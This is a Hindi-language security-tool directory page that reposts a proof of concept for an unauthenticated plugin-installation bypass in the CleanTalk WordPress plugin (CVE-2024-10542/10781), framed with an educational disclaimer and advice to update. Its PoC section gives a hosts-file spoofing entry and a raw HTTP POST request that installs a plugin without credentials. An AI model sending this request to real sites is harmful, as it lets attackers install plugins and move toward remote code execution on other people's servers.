Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10542 — WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 बिना प्रमाणीकरण के मनमाना प्लगइन इंस्टॉलेशन भेद्यता के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/ubaydev/cve-2024-10542
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 बिना प्रमाणीकरण के मनमाना प्लगइन इंस्टॉलेशन भेद्यता के प्रति संवेदनशील है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10542 और CVE-2024-10781 का PoC: CleanTalk प्लगइन <= 6.43.2 में Spam protection, AntiSpam, FireWall में Broken Authentication

अस्वीकरण (Disclaimer):

इस दस्तावेज़ में CVE-2024-10542 के संबंध में दी गई जानकारी केवल सीखने और शैक्षिक उद्देश्यों के लिए है। हम इस जानकारी के किसी भी हानिकारक उद्देश्यों के लिए उपयोग को प्रोत्साहित या अधिकृत नहीं करते हैं, जिसमें शोषण (exploitation), सिस्टम के साथ छेड़छाड़, या अन्य अवैध गतिविधियाँ शामिल हैं, लेकिन इन्हीं तक सीमित नहीं हैं।

परिचय (Introduction):

लगातार जटिल होते डिजिटल परिदृश्य में, कई साइट मालिकों के लिए वेबसाइटों की सुरक्षा सुनिश्चित करना सर्वोपरि है। हाल ही में, दो गंभीर कमजोरियाँ खोजी गई हैं जो WordPress साइटों के लिए एक महत्वपूर्ण खतरा पैदा करती हैं। ये कमजोरियाँ प्रसिद्ध CleanTalk प्लगइन को प्रभावित करती हैं, जो स्पैम सुरक्षा, एंटी-स्पैम उपाय और फ़ायरवॉल प्रदान करता है। इस स्थिति को और भी गंभीर क्या बनाता है? आइए गहराई से जानें!

CVE-2024-10542 और CVE-2024-10781 के रूप में ट्रैक की गई दो कमजोरियाँ बिना प्रमाणीकरण वाले हमलावरों (unauthenticated attackers) को संवेदनशील साइटों पर दुर्भावनापूर्ण प्लगइन्स इंस्टॉल और सक्रिय करने की अनुमति दे सकती हैं। यह न केवल साइट की प्रतिष्ठा को खतरे में डालता है, बल्कि हमलावरों के लिए रिमोट कोड निष्पादित करने का दरवाज़ा भी खोलता है। 10 में से 9.8 के CVSS स्कोर के साथ, यह स्पष्ट है कि ये कमजोरियाँ अत्यंत खतरनाक श्रेणी में आती हैं। Wordfence के अनुसार, दोनों कमजोरियाँ एक प्राधिकरण बाइपास (authorization bypass) समस्या से संबंधित हैं, जो किसी दुर्भावनापूर्ण अभिनेता (malicious actor) को मनमाने प्लगइन्स इंस्टॉल और सक्रिय करने की अनुमति दे सकती हैं। यदि सक्रिय किया गया प्लगइन स्वयं कमजोर है, तो यह आगे चलकर रिमोट कोड निष्पादन का मार्ग प्रशस्त कर सकता है।

PoC:

सबसे पहले, दुर्भावनापूर्ण उपयोगकर्ता अपने ऑपरेटिंग सिस्टम पर अपनी hosts फ़ाइल सेट करेंगे:

root@kitploit:~
127.0.0.1 cleantalk.org

जिसके बाद वे इस प्रकार एक अनुरोध भेजते हैं:

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

निष्कर्ष (Conclusion):

साइबर सुरक्षा हर साइट मालिक की साझा ज़िम्मेदारी है। प्लगइन्स को अद्यतन रखकर और संभावित कमजोरियों के प्रति सतर्क रहकर, हम अपनी साइटों को दुर्भावनापूर्ण हमलों से बचा सकते हैं। सुनिश्चित करें कि आपने CleanTalk को नवीनतम संस्करण में अपडेट कर लिया है और अधिकतम सुरक्षा सुनिश्चित करने के लिए अन्य प्लगइन्स की नियमित जाँच करते रहें। याद रखें, छोटे कदम बड़ी आपदाओं को रोक सकते हैं!

संदर्भ (Reference):

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

मुझे एक कॉफ़ी खरीदकर दें (Buy me a coffe):

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

धन्यवाद (Thanks To):

अल्लाह, मुहम्मद स.अ.व., mikemyers, Markdown Monster, मेरा परिवार, और आप?

टूल डाउनलोड करें